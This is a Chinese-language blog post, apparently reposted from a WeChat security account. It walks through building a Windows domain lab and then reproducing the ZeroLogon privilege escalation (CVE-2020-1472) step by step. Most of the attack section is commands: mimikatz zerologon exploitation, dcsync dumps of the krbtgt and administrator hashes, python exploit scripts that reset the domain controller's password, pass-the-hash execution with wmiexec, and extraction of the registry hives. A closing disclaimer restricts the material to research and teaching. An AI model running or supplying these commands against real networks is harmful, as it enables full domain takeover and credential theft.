1,傻瓜化域安装
运行DCPROMO
第二步
第三步
第四步
第五步 选择是
第六步 设置完密码安装
第七步 安装成功
加入域
登录设置好的域密码
从域服务器看是否成功
新建个域普通用户
登录到域
2,ZeroLogon复现
信息收集:
net time /domain && net user/domain
获取域ip
然后使用mimikatz进行攻击
执行poc
lsadump::zerologon/target:WIN-171DIUDNLE5.yourdomain.com /account:WIN-171DIUDNLE5$
使用exp攻击
lsadump::zerologon /target:WIN-171DIUDNLE5.yourdomain.com/account:WIN-171DIUDNLE5$ /exploit
尝试使用空密码登录域管
lsadump::dcsync /domain:yourdomain.com/dc:WIN-171DIUDNLE5.yourdomain.com /user:krbtgt /authuser:WIN-171DIUDNLE5$/authdomain:yourdomain /authpassword:"" /authntlm
导出hash
lsadump::dcsync /domain:yourdomain.com/dc:WIN-171DIUDNLE5.yourdomain.com /user:administrator /authuser:WIN-171DIUDNLE5$/authdomain:yourdomain /authpassword: /authntlm
解密获取明文
导出到文本
"lsadump::dcsync/domain:yourdomain.com /dc:WIN-171DIUDNLE5.yourdomain.com /user:administrator/authuser:WIN-171DIUDNLE5$ /authdomain:yourdomain /authpassword:/authntlm" >>1.txt
恢复密码
lsadump::postzerologon /target:yourip/account:WIN-171DIUDNLE5$
恢复后
密码会改成password updated里的内容
3,python实战复现
先用测试导出哈希测试渠道
1.git clone https://github.com/mstxq17/cve-2020-1472.git
2.pip3 install -r requirements.txt
proxychains4 secretsdump.py topsectest/Administrator:'password'@yourip -just-dc-user "WIN-171DIUDNLE5$"
exp报错
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket && pip3 install .
测试是否存在漏洞:
proxychains python3 zerologon_tester.py WIN-171DIUDNLE5 yourip
成功
重置域密码:
proxychains python3 cve-2020-1472-exploit.py WIN-171DIUDNLE5 yourip
导出哈希
proxychains secretsdump.py yourdomain.com/WIN-171DIUDNLE5$@yourip-no-pass
执行命令
wmiexec.py -hashes proxychains python3 /usr/local/bin/wmiexec.py-hashes aad3b435b51404eeaad3b435b51404ee:00affd88fa****4560bf9fef0ec2f username/Administrator@youip
恢复密码
- reg save HKLMSYSTEM system.save
- reg save HKLMSAM sam.save
- reg save HKLMSECURITY security.save
- get system.save
- get sam.save
- get security.save
- del /f system.save
- del /f sam.save
- del /f security.save
导出
下载到kail
提取
secretsdump.py -sam sam.save-system system.save -security security.save LOCAL
恢复
python3 restorepassword.py WIN-171DIUDNLE5@WIN-171DIUDNLE5 -target-ip yourip -hexpass 570061007a0061003100320*****a00610031003200330034002f00
本文始发于微信公众号(白帽100安全攻防实验室):CVE-2020-1472 windows域控提权 zerologon从搭建到复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论